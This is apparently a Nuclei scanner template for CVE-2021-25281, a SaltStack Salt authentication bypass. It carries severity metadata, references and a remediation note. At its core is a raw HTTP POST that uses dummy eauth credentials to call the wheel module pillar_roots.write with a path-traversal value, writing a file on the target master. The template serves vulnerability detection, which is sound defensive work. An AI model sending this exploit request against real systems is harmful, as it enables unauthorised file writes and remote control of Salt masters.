id: CVE-2021-25281 info: name: SaltStack Salt <3002.5 - Auth Bypass author: madrobot severity: critical description: SaltStack Salt before 3002.5 does not honor eauth credentials for the wheel_async client, allowing attackers to remotely run any wheel modules on the master. remediation: | Upgrade to SaltStack Salt version 3002.5 or later to mitigate this vulnerability. reference: - http://hackdig.com/02/hack-283902.htm - https://dozer.nz/posts/saltapi-vulns - https://nvd.nist.gov/vuln/detail/CVE-2021-25281 - https://github.com/saltstack/salt/releases - https://www.saltstack.com/blog/active-saltstack-cve-announced-2021-jan-21/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-25281 cwe-id: CWE-287 epss-score: 0.87406 epss-percentile: 0.98631 cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: saltstack product: salt tags: cve,cve2021,saltapi,rce,saltstack,unauth http: - raw: - | POST /run HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"client":"wheel_async","fun":"pillar_roots.write","data":"testing","path":"../../../../../../../tmp/testing","username":"1","password":"1","eauth":"pam"} matchers-condition: and matchers: - type: word part: body words: - "return" - "tag" - "jid" - "salt" - "wheel" condition: and - type: status status: - 200 # digest: 4b0a00483046022100832505461e275bee296eefef6ebff2291fa8b9b696b9d14bc16babda7e02dda6022100cfdeaa90b36ac7a7db430d5e6ce75fcdc61cbaefb511b9bd0b44bffc2cbda241:922c64590222798bb761d5b6d8e72950